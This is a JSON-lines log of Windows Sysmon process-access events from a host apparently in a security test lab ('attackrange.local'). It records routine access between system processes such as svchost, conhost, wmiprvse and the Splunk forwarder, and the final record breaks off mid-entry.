{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1776,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1777,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1778,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1779,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1780,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1781,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.125\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-00108A8F0300}\r\nTargetProcessId: 4076\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.125","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-00108A8F0300}","TargetProcessId":"4076","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1782,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.313\r\nSourceProcessGUID: {A837DB8D-01C7-5F25-0000-001063890300}\r\nSourceProcessId: 4004\r\nSourceThreadId: 4040\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1040\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\System32\\combase.dll+4d01b|C:\\Windows\\System32\\combase.dll+9e002|C:\\Windows\\System32\\combase.dll+9e92e|C:\\Windows\\System32\\combase.dll+9e6ef|C:\\Windows\\System32\\combase.dll+3fff8|C:\\Windows\\System32\\combase.dll+3fc10|C:\\Windows\\System32\\combase.dll+4fa47|C:\\Windows\\System32\\combase.dll+c1ef4|C:\\Windows\\System32\\combase.dll+4ea07|C:\\Windows\\System32\\combase.dll+4a6d0|C:\\Windows\\System32\\combase.dll+3f5a|C:\\Windows\\System32\\RPCRT4.dll+dbd2a|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3f3|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.313","SourceProcessGUID":"{A837DB8D-01C7-5F25-0000-001063890300}","SourceProcessId":"4004","SourceThreadId":"4040","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1040","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\System32\\combase.dll+4d01b|C:\\Windows\\System32\\combase.dll+9e002|C:\\Windows\\System32\\combase.dll+9e92e|C:\\Windows\\System32\\combase.dll+9e6ef|C:\\Windows\\System32\\combase.dll+3fff8|C:\\Windows\\System32\\combase.dll+3fc10|C:\\Windows\\System32\\combase.dll+4fa47|C:\\Windows\\System32\\combase.dll+c1ef4|C:\\Windows\\System32\\combase.dll+4ea07|C:\\Windows\\System32\\combase.dll+4a6d0|C:\\Windows\\System32\\combase.dll+3f5a|C:\\Windows\\System32\\RPCRT4.dll+dbd2a|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3f3|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1783,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.359\r\nSourceProcessGUID: {A837DB8D-01C7-5F25-0000-00108A8F0300}\r\nSourceProcessId: 4076\r\nSourceThreadId: 4080\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.359","SourceProcessGUID":"{A837DB8D-01C7-5F25-0000-00108A8F0300}","SourceProcessId":"4076","SourceThreadId":"4080","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1784,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.375\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nSourceProcessId: 2804\r\nSourceThreadId: 3124\r\nSourceImage: C:\\Windows\\system32\\DFSRs.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 